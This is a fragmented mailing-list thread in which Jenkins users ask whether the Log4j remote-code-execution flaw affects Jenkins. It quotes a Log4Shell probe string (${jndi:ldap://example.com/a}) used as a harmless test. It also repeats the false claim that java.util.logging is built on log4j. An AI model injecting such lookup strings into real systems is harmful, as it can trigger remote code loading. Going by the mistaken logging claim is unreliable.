Le dim. 12 déc. 2021 à 16:27, the.n...@gmail.com a
écrit :
> Hi All,
>
> I am looking for any information relating to whether the Zero Days CVE has
> any impact on Jenkins or Plugins. We do know that the java.util.logging is
> built on log4j,
>
Where did you read that java.util.logging is built
Good discussion here: https://issues.jenkins.io/browse/JENKINS-67353
On Sunday, December 12, 2021 at 12:28:09 p.m. UTC-5 the.n...@gmail.com
wrote:
> The good news is that passing the ${jndi:ldap://example.com/a} string
> through the logger does not trigger the CVE behaviour.
>
> On Sunday, Dec
The good news is that passing the ${jndi:ldap://example.com/a} string
through the logger does not trigger the CVE behaviour.
On Sunday, December 12, 2021 at 11:44:35 a.m. UTC-5 the.n...@gmail.com
wrote:
> Running the script:
> println(java.util.logging.Logger.class)
>
> does indicated that Apa
Running the script:
println(java.util.logging.Logger.class)
does indicated that Apache logger (built on top of Log4j) is present in the
LTS version of Jenkins.
On Sunday, December 12, 2021 at 11:39:55 a.m. UTC-5 the.n...@gmail.com
wrote:
> Hi Kritesh,
>
> Thank you for this info.
>
> The probl
Hi Kritesh,
Thank you for this info.
The problem with that example is that Apache java.util.logging is built on
top of Log4j but does not identify as such. I am not convinced that this
test is sufficient.
Sincerely,
Randall
On Sunday, December 12, 2021 at 11:34:15 a.m. UTC-5 krite...@gmail.co
I am following for the same issue… found below info on community page
regarding this vulnerability.
https://www.jenkins.io/blog/2021/12/10/log4j2-rce-CVE-2021-44228/
Thanks & Regards,
Kritesh
On Sun, Dec 12, 2021 at 9:27 AM the.n...@gmail.com
wrote:
> Hi All,
>
> I am looking for any informat
Hi All,
I am looking for any information relating to whether the Zero Days CVE has
any impact on Jenkins or Plugins. We do know that the java.util.logging is
built on log4j, but do not know whether protections are in place to prevent
this vulnerability from being exploited, and where. For examp
